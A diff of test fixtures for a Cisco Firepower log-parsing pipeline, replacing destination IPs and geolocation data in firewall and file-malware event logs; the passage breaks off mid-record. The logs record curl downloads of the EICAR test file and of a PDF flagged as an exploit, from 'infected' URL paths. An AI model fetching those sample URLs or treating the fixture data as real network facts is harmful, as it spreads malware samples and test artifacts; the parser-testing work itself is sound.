+2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb
+2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
+2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip
 2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity
 Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip
diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json
index 6071f449409..52f31f7087c 100644
--- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json
+++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log-expected.json
@@ -62,7 +62,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-07-19T09:06:53.873358281Z",
+ "ingested": "2021-12-09T13:33:12.624161600Z",
 "original": "2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity",
 "code": "430002",
 "kind": "event",
@@ -178,7 +178,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:53.873363825Z", + "ingested": "2021-12-09T13:33:12.624169900Z", "original": "2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity", "code": "430003", "kind": "event", @@ -247,24 +247,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 0, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 0 }, "source": { @@ -312,7 +315,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { 
@@ -320,8 +323,8 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:53.873366012Z", - "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", + "ingested": "2021-12-09T13:33:12.624175500Z", + "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", "code": "430002", "kind": "event", "action": "connection-started", @@ -353,7 +356,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "50074", "src_ip": "10.0.1.20", 
@@ -388,24 +391,27 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "port": 53, "bytes": 314, - "ip": "8.8.8.8", + "ip": "81.2.69.144", "packets": 2 }, "source": { @@ -453,7 +459,7 @@ ], "ip": [ "10.0.1.20", - "8.8.8.8" + "81.2.69.144" ] }, "host": { 
@@ -462,8 +468,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:53.873443908Z", - "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", + "ingested": "2021-12-09T13:33:12.624180900Z", + "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", "code": "430003", "kind": "event", "start": "2019-08-15T16:07:00.000Z", @@ -493,7 +499,7 @@ "dns_query": "siem-inside", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "8.8.8.8", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "udp", 
@@ -529,26 +535,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 16509, + "number": 20712, "organization": { - "name": "Amazon.com, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "52.59.244.233", + "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "52.59.244.233", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -594,7 +600,7 @@ ], "ip": [ "10.0.1.20", - "52.59.244.233" + "81.2.69.144" ] }, "host": { 
@@ -602,8 +608,8 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:53.873452443Z", - "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", + "ingested": "2021-12-09T13:33:12.624186200Z", + "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", "action": "connection-started", @@ -633,7 +639,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "52.59.244.233", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "43228", "src_ip": "10.0.1.20", 
@@ -660,26 +666,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 16509, + "number": 20712, "organization": { - "name": "Amazon.com, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "52.59.244.233", + "address": "81.2.69.144", "port": 80, "bytes": 41319018, - "ip": "52.59.244.233", + "ip": "81.2.69.144", "packets": 29001 }, "source": { @@ -737,7 +743,7 @@ ], "ip": [ "10.0.1.20", - "52.59.244.233" + "81.2.69.144" ] }, "host": { 
@@ -751,8 +757,8 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-07-19T09:06:53.873454944Z", - "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", + "ingested": "2021-12-09T13:33:12.624191600Z", + "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", "code": "430003", "kind": "event", 
"start": "2019-08-15T16:07:18.000Z", @@ -781,7 +787,7 @@ "responder_packets": "29001", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "52.59.244.233", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "tcp", @@ -823,26 +829,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-ST", - "city_name": "Magdeburg", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Saxony-Anhalt", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 11.6167, - "lat": 52.1333 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 43341, + "number": 20712, "organization": { - "name": "MDlink online service center GmbH" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "213.211.198.62", + "address": "81.2.69.144", "port": 80, "bytes": 74, - "ip": "213.211.198.62", + "ip": "81.2.69.144", "packets": 1 }, "source": { @@ -888,7 +894,7 @@ ], "ip": [ "10.0.1.20", - "213.211.198.62" + "81.2.69.144" ] }, "host": { 
@@ -896,8 +902,8 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:53.873457118Z", - "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", + "ingested": "2021-12-09T13:33:12.624240600Z", + "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", "action": "connection-started", @@ -927,7 +933,7 @@ "prefilter_policy": "Default Prefilter Policy", "nap_policy": "Balanced Security and Connectivity", "ingress_zone": "input-zone", - "dst_ip": "213.211.198.62", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_port": "46000", "src_ip": "10.0.1.20", 
@@ -954,26 +960,26 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-ST", - "city_name": "Magdeburg", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Saxony-Anhalt", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 11.6167, - "lat": 52.1333 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 43341, + "number": 20712, "organization": { - "name": "MDlink online service center GmbH" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "213.211.198.62", + "address": "81.2.69.144", "port": 80, "bytes": 690, - "ip": "213.211.198.62", + "ip": "81.2.69.144", "packets": 4 }, "source": { @@ -1028,7 +1034,7 @@ ], "ip": [ "10.0.1.20", - "213.211.198.62" + "81.2.69.144" ] }, "host": { 
@@ -1042,8 +1048,8 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-07-19T09:06:53.873459202Z", - "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", + "ingested": "2021-12-09T13:33:12.624248Z", + "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", "code": "430003", "kind": "event", "start": "2019-08-16T09:33:15.000Z", @@ -1072,7 +1078,7 @@ "responder_packets": "4", "access_control_rule_action": "Allow", "nap_policy": "Balanced Security and Connectivity", - "dst_ip": "213.211.198.62", + "dst_ip": "81.2.69.144", "ac_policy": "default", "src_ip": "10.0.1.20", "protocol": "tcp", 
@@ -1166,7 +1172,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:53.873461054Z", + "ingested": "2021-12-09T13:33:12.624253500Z", "original": "2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -1298,7 +1304,7 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-07-19T09:06:53.873467586Z", + "ingested": "2021-12-09T13:33:12.624259Z", "original": "Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip", "code": "430003", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log index 5a6fe1852f7..fae3c9aebf8 100644 
--- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log 
@@ -5,6 +5,6 @@ Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100. Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip -2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 
213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip +2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip 2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 
2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d -2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 18.197.225.123, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d +2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 